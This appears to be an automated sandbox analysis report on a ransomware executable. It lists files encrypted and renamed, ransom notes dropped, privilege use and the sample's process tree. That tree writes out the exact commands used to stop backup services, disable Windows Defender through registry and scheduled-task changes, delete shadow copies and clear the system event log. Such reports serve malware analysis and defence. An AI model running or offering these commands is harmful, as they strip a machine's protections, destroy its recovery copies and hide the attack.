| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153514.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_5uH0qhuoXYo0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR30F.GIF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_Z2quXlgDkzE0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_ojQKlBCZDnA0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_TzykaNotCdk0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\COPYING.txt.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_olYOts7lm-U0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_1tDTC_bjbtA0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.DPV.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_lMOgLcssY100.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.XML.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_Z9imyhRPgjM0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\cmm\qj7U_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Memories_buttonClear.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\PREVIEW.GIF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_EwV7Y-TN__c0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00462_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_M-aaGLqcOjU0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00683_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_40L0r83EcTo0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left.gif.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_k8KQJq5I3KY0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_3PPAwRdHulE0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\jfxrt.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_StiGhLtloik0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00911_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_EzaU1TNDneo0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02126_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_m8N1i6q0VSc0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00532_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_ox2uVgOGsTA0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_QJlksLVgse00.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00273_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_r2zx9Wi-H0I0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_U9ZGOKqCWIs0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\management\jmxremote.password.template.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_11Kbyr6edw40.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_ecr_T1FYf2Y0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_dot.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099183.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_HfpdyizsseQ0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_3JiUAhbEzew0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_7Nx8A3dt54c0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_N_9l1cLWwFQ0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_uGJNSS0GKgU0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_0vB9XrRR6Dc0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00116_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_wQ2oLl_O-b40.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BORDERBB.DPV.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT__wZB4-WvE1k0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_zjVU9niMZD80.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\ado\msado27.tlb | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\ext\qj7U_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_Tj62k6ubqm00.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\js\timeZones.js | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_rest.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe
"C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
